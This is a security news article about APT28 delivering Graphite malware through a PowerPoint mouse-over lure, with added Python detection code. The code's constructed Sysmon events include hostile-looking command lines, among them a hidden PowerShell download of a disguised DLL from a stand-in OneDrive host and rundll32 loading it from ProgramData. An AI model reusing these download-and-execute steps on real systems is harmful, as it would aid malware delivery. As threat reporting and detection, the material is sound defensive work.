Threat Actors Utilize PowerPoint Files to Distribute Graphite Malware


Threat actors have started using PowerPoint presentations as a code-execution vector to deliver Graphite malware in targeted attacks.

APT28 (Fancy Bear), a threat actor group linked to Russia, has recently been seen using this method to distribute the Graphite malware. The lure file is allegedly linked to the OECD, an economic development organization; it contains instructions in English and French for using the Zoom app's "interpretation" feature.

The mouse-over technique is being leveraged to spread Graphite malware.

The attackers use a PowerPoint (.PPT) file as the lure, purportedly linked to the Organization for Economic Co-operation and Development (OECD). The PPT file contains two slides with instructions in English and French, and it carries a hyperlink that serves as the trigger for launching a malicious PowerShell script via the SyncAppvPublishingServer utility.

As soon as the victim moves the mouse over the hyperlink while viewing the lure document, the malicious PowerShell script runs and downloads a JPEG file ("DSC0002.jpeg") from a Microsoft OneDrive account.

The "JPEG" is in fact an encrypted DLL (lmapi2.dll); it is decrypted and dropped into the C:\ProgramData\ directory. The DLL is later executed via rundll32.exe, and a registry key is created for it to guarantee persistence.

The goal of Graphite malware is to let the attacker load further malware into the system's memory.

According to Cluster25, when a new file is identified, its content is downloaded and decrypted with the AES-256-CBC algorithm. The malware also permits remote code execution: it allocates a new memory region and executes the incoming shellcode on a newly created dedicated thread.
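As an added illustration of how a defender might spot this chain in endpoint telemetry (example code written for this page, not code from the original post or from Cluster25), the following Python scans constructed Sysmon-style process-creation events for the parent/child relationships and paths described above; the event values, hostname and rule names are assumptions, not the real indicators.

```python
import re

# Constructed Sysmon-style process-creation events (Event ID 1 fields), not real telemetry.
# They replay the chain described above: PowerPoint -> SyncAppvPublishingServer ->
# PowerShell download of a "JPEG" from OneDrive -> rundll32 loading a DLL from ProgramData.
EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "image": r"C:\Windows\System32\SyncAppvPublishingServer.exe",
     "cmdline": r'"C:\Windows\System32\SyncAppvPublishingServer.exe" "n; <constructed script>"'},
    {"parent": r"C:\Windows\System32\SyncAppvPublishingServer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iwr https://example.files.1drv.com/x/DSC0002.jpeg"'},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\ProgramData\lmapi2.dll,#1"},
    {"parent": r"C:\Windows\explorer.exe",                                        # benign
     "image": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "cmdline": r'"POWERPNT.EXE" "C:\Users\alice\Documents\quarterly.pptx"'},
    {"parent": r"C:\Windows\System32\svchost.exe",                                # benign
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

# Matched against lower-cased command lines.
PROGRAMDATA_DLL = re.compile(r"c:\\programdata\\[^\s\",]+\.dll")
ONEDRIVE_IMAGE = re.compile(r"1drv\.com\S*\.jpe?g")


def classify(event):
    """Return the names of the rules an event matches (empty list if none)."""
    parent = event["parent"].lower()
    image = event["image"].lower()
    cmd = event["cmdline"].lower()
    hits = []
    # Office has no business launching the App-V publishing helper; here the hyperlink does it.
    if parent.endswith("powerpnt.exe") and "syncappvpublishingserver" in image + " " + cmd:
        hits.append("office-spawns-syncappv")
    # The helper is a known proxy for running PowerShell; flag that parent/child pair.
    if parent.endswith("syncappvpublishingserver.exe") and image.endswith("powershell.exe"):
        hits.append("syncappv-spawns-powershell")
    # A download from OneDrive file storage whose "image" name hides the encrypted DLL.
    if ONEDRIVE_IMAGE.search(cmd):
        hits.append("onedrive-image-fetch")
    # rundll32 loading a DLL out of the user-writable ProgramData directory.
    if image.endswith("rundll32.exe") and PROGRAMDATA_DLL.search(cmd):
        hits.append("rundll32-programdata-dll")
    return hits


def scan(events):
    """Return (index, matched rules) for every suspicious event, in order."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]
```

Registry-set events for the persistence key are not modelled here; a real deployment would add the equivalent check on Sysmon Event ID 13 data.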

Graphite Malware IoCs



Published September 28th, 2022 | malicious cyber actors, Malicious extension, Malware, Security Advisory, Security Update

About the Author:

FirstHackersNews - Identifies Security
